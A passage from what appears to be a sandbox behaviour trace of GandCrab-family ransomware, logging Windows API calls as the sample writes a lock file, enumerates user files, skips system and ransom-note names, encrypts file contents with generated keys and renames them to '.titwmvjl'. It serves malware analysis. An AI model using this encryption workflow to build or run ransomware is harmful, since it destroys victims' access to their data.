44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0095.296] WriteFile (in: hFile=0x2b4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259efe0, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259efe0*=0x2162, lpOverlapped=0x0) returned 1 [0095.297] CloseHandle (hObject=0x2b4) returned 1 [0095.297] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.297] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.297] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x28, wMilliseconds=0x26c)) [0095.298] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.298] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0095.299] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0095.299] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\d2ca4a09d2ca4deb61a.lock") returned 86 [0095.299] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2b4 [0095.300] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.300] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.300] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\") returned 62 [0095.300] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\*" [0095.300] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\*", fInfoLevelId=0x1, lpFindFileData=0x259effc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259effc) returned 0x5036f8 [0095.301] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.301] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0095.302] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.302] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.302] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0095.302] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0095.302] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0095.302] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\d2ca4a09d2ca4deb61a.lock" [0095.302] lstrlenW (lpString=".titwmvjl") returned 9 [0095.302] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\d2ca4a09d2ca4deb61a.lock") returned 86 [0095.302] VirtualAlloc (lpAddress=0x0, dwSize=0xec, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.302] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 95 [0095.302] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\d2ca4a09d2ca4deb61a.lock") returned 86 [0095.302] lstrlenW (lpString=".lock") returned 5 [0095.302] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.302] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0095.302] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.302] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.303] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0095.303] lstrcmpW (lpString1="EX_3P8.avi", lpString2=".") returned 1 [0095.303] lstrcmpW (lpString1="EX_3P8.avi", lpString2="..") returned 1 [0095.303] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\", lpString2="EX_3P8.avi" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\EX_3P8.avi") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\EX_3P8.avi" [0095.303] lstrlenW (lpString=".titwmvjl") returned 9 [0095.303] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\EX_3P8.avi") returned 72 [0095.303] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.303] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\EX_3P8.avi.titwmvjl") returned 81 [0095.303] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\EX_3P8.avi") returned 72 [0095.303] lstrlenW (lpString=".avi") returned 4 [0095.303] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.304] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".avi ") returned 5 [0095.304] lstrcmpiW (lpString1=".avi", lpString2=".titwmvjl") returned -1 [0095.304] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.304] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\EX_3P8.avi") returned 72 [0095.304] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\EX_3P8.avi") returned 72 [0095.304] lstrcmpiW (lpString1="EX_3P8.avi", lpString2="desktop.ini") returned 1 [0095.304] lstrcmpiW (lpString1="EX_3P8.avi", lpString2="autorun.inf") returned 1 [0095.304] lstrcmpiW (lpString1="EX_3P8.avi", lpString2="ntuser.dat") returned -1 [0095.304] lstrcmpiW (lpString1="EX_3P8.avi", lpString2="iconcache.db") returned -1 [0095.304] lstrcmpiW (lpString1="EX_3P8.avi", lpString2="bootsect.bak") returned 1 [0095.304] lstrcmpiW (lpString1="EX_3P8.avi", lpString2="boot.ini") returned 1 [0095.304] lstrcmpiW (lpString1="EX_3P8.avi", lpString2="ntuser.dat.log") returned -1 [0095.304] lstrcmpiW (lpString1="EX_3P8.avi", lpString2="thumbs.db") returned -1 [0095.304] lstrcmpiW (lpString1="EX_3P8.avi", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0095.304] lstrcmpiW (lpString1="EX_3P8.avi", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0095.304] lstrcmpiW (lpString1="EX_3P8.avi", lpString2="KRAB-DECRYPT.html") returned -1 [0095.304] lstrcmpiW (lpString1="EX_3P8.avi", lpString2="CRAB-DECRYPT.html") returned 1 [0095.304] lstrcmpiW (lpString1="EX_3P8.avi", lpString2="KRAB-DECRYPT.txt") returned -1 [0095.304] lstrcmpiW (lpString1="EX_3P8.avi", lpString2="CRAB-DECRYPT.txt") returned 1 [0095.304] lstrcmpiW (lpString1="EX_3P8.avi", lpString2="ntldr") returned -1 [0095.305] lstrcmpiW (lpString1="EX_3P8.avi", lpString2="NTDETECT.COM") returned -1 [0095.305] lstrcmpiW (lpString1="EX_3P8.avi", lpString2="Bootfont.bin") returned 1 [0095.305] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\EX_3P8.avi") returned 72 [0095.305] lstrlenW (lpString=".avi") returned 4 [0095.305] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.305] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".avi ") returned 5 [0095.305] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.305] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.305] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\EX_3P8.avi" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\ex_3p8.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2bc [0095.306] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.306] ReadFile (in: hFile=0x2bc, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ef48, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ef48*=0x21c, lpOverlapped=0x0) returned 1 [0095.307] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.307] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.307] CryptAcquireContextW (in: phProv=0x259ee78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee78*=0x4c9980) returned 1 [0095.308] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0095.308] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0095.308] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0095.309] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259ef04 | out: pbBuffer=0x259ef04) returned 1 [0095.309] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.309] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.309] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.309] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.309] CryptAcquireContextW (in: phProv=0x259ee78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee78*=0x4c9980) returned 1 [0095.309] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0095.310] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0095.310] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0095.310] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259ef24 | out: pbBuffer=0x259ef24) returned 1 [0095.310] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.310] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.310] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.311] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.311] CryptAcquireContextW (in: phProv=0x259ee6c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee6c*=0x4c9980) returned 1 [0095.311] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.312] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ee70 | out: phKey=0x259ee70*=0x503778) returned 1 [0095.312] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.312] CryptGetKeyParam (in: hKey=0x503778, dwParam=0x8, pbData=0x259ee64, pdwDataLen=0x259ee68, dwFlags=0x0 | out: pbData=0x259ee64*=0x800, pdwDataLen=0x259ee68*=0x4) returned 1 [0095.312] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.312] CryptEncrypt (in: hKey=0x503778, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259ee9c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259ee9c*=0x100) returned 1 [0095.312] GetLastError () returned 0x0 [0095.312] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.313] CryptDestroyKey (hKey=0x503778) returned 1 [0095.313] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.313] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.313] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.313] CryptAcquireContextW (in: phProv=0x259ee6c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee6c*=0x4c9980) returned 1 [0095.314] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.314] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ee70 | out: phKey=0x259ee70*=0x503478) returned 1 [0095.314] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.314] CryptGetKeyParam (in: hKey=0x503478, dwParam=0x8, pbData=0x259ee64, pdwDataLen=0x259ee68, dwFlags=0x0 | out: pbData=0x259ee64*=0x800, pdwDataLen=0x259ee68*=0x4) returned 1 [0095.314] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.315] CryptEncrypt (in: hKey=0x503478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259ee9c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259ee9c*=0x100) returned 1 [0095.315] GetLastError () returned 0x0 [0095.315] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.315] CryptDestroyKey (hKey=0x503478) returned 1 [0095.315] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.315] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.316] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0095.316] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0095.316] ReadFile (in: hFile=0x2bc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ef48, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ef48*=0xbb07, lpOverlapped=0x0) returned 1 [0095.333] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0xffff44f9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.333] WriteFile (in: hFile=0x2bc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xbb07, lpNumberOfBytesWritten=0x259ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ef2c*=0xbb07, lpOverlapped=0x0) returned 1 [0095.335] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.335] WriteFile (in: hFile=0x2bc, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ef2c*=0x21c, lpOverlapped=0x0) returned 1 [0095.337] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.349] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.350] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.350] CloseHandle (hObject=0x2bc) returned 1 [0095.350] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\EX_3P8.avi" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\ex_3p8.avi"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\EX_3P8.avi.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\ex_3p8.avi.titwmvjl"), dwFlags=0x1) returned 1 [0095.351] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.351] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0095.351] lstrcmpW (lpString1="FkeyX3zUJmV7_VQl.swf", lpString2=".") returned 1 [0095.351] lstrcmpW (lpString1="FkeyX3zUJmV7_VQl.swf", lpString2="..") returned 1 [0095.351] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\", lpString2="FkeyX3zUJmV7_VQl.swf" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\FkeyX3zUJmV7_VQl.swf") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\FkeyX3zUJmV7_VQl.swf" [0095.351] lstrlenW (lpString=".titwmvjl") returned 9 [0095.351] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\FkeyX3zUJmV7_VQl.swf") returned 82 [0095.351] VirtualAlloc (lpAddress=0x0, dwSize=0xe4, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.352] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: 